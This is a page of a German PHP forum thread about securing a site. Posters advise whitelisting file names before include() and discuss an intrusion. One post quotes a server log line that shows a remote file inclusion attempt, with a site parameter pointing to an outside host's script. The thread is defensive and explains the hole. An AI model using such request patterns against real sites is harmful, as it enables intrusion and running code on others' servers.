Sicheres PHP

Einklappen
X
Einklappen
 
  • Seite von 2
  • Filter
  • Zeit
  • Anzeigen
Alles löschen
neue Beiträge
Vorherige 1 2 template Weiter
  • #16
    Original geschrieben von stekoe2000
    Seit dem bin ich [...] etwas bedenklich, was meine Programmierweise angeht...
    Sehr gut.

    PHP-Code:
    header("Location: error.htm?errorcode=404"); 
    Auf eine 404-Fehlerseite weiterzuleiten, ist übrigens ziemlich ungünstig.
    Produziert erst mal per Default einen HTTP Status Code 200 - müsste dann erst wieder auf 404 gesetzt werden. Wenn man's ganz vergisst, dann denken Suchmaschinen und ähnliche Clients, es handele sich um eine ganz normale Inhaltsseite.
    I don't believe in rebirth. Actually, I never did in my whole lives.

    Kommentar

    • #17
      Also die gröbsten Probs solltest du nur schon loswerden wenn du vor dem include() den Parameter auf erlaubten Dateinamen prüfst. Leg ein Array mit den erlaubten Files an und prüfe vor dem Einbinden ob der angegebene GET Param im Array vorkommt, sonst gibt's einen 404-er

      Gruss

      tobi
      Gutes Tutorial | PHP Manual | MySql Manual | PHP FAQ | Apache | Suchfunktion für eigene Seiten

      [color=red]"An error does not become truth by reason of multiplied propagation, nor does truth become error because nobody sees it."[/color]
      Mohandas Karamchand Gandhi (Mahatma Gandhi) (Source)

      Kommentar

      • #18
        Code:
        77.180.135.81 - - 
[28/Feb/2007:10:31:21 +0100] 
"GET /?site=http://217.235.164.165/o HTTP/1.1" 200 10776 "-" 
"Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.2) Gecko/20070219 Firefox/2.0.0.2"
        das war der Übeltäter, der mich hat Zweifeln lassen ^^

        Wenn ich den erwischen würde, bekäme er von mir nen Orden, für MEINE Dummheit xD und das aufzeigen der Lücke..
        Zuletzt geändert von stekoe2000; 01.03.2007, 11:46.
        Liebe Grüße,
        SteKoe!

        PHP Tutorials
        Peter Kropff | Quakenet | Schattenbaum.net

        Kommentar

        • #19
          du kannst die ip bei http://www.t-com.de/ip-abuse melden

          look there: http://www.ripe.net/fcgi-bin/whois?f...&submit=Search
          Killerspiele sollten in der Größenordnung von Kinder********************grafie eingeordnet werden.(G. Beckstein)
          - ...und solche Behauptungen in "falsches Resourcenmanagement"

          Kommentar

          • #20
            Wenn ich den erwischen würde, bekäme er von mir nen Orden, für MEINE Dummheit xD und das aufzeigen der Lücke..
            Hier war die Tage schon mal so etwas ..
            Da hat ein Forenmitglied ein phpKit betrieben welches gehackt wurde.. Stand etwas wie (owned by So(u)ma(t)ri Crew ) drunter.
            War das bei dir auch der Fall?...

            Hat der jenige irgendwas angestellt oder einfach nur seinen Banner mit auf die Seite gepackt so wie´s z.B der CCC mal gemacht hat ? :P

            Und was dieses blinde includen angeht solltest du dir den tip von jahlives zu herzen nehmen..

            Wenn ich schon includiere dann nur DIE dateien die in einem Array festgelegt wurden.
            gruss Chris

            [color=blue]Derjenige, der sagt: "Es geht nicht", soll den nicht stoeren, der's gerade tut."[/color]

            Kommentar

            • #21
              ich hab mich gerademal mit dem Begriff 'Clanpage' bei Google umgesehen...auf den hinteren Seiten war fast jede Seite ein Sicherheitsloch x(
              Killerspiele sollten in der Größenordnung von Kinder********************grafie eingeordnet werden.(G. Beckstein)
              - ...und solche Behauptungen in "falsches Resourcenmanagement"

              Kommentar

              Vorherige 1 2 template Weiter
              Lädt...
              X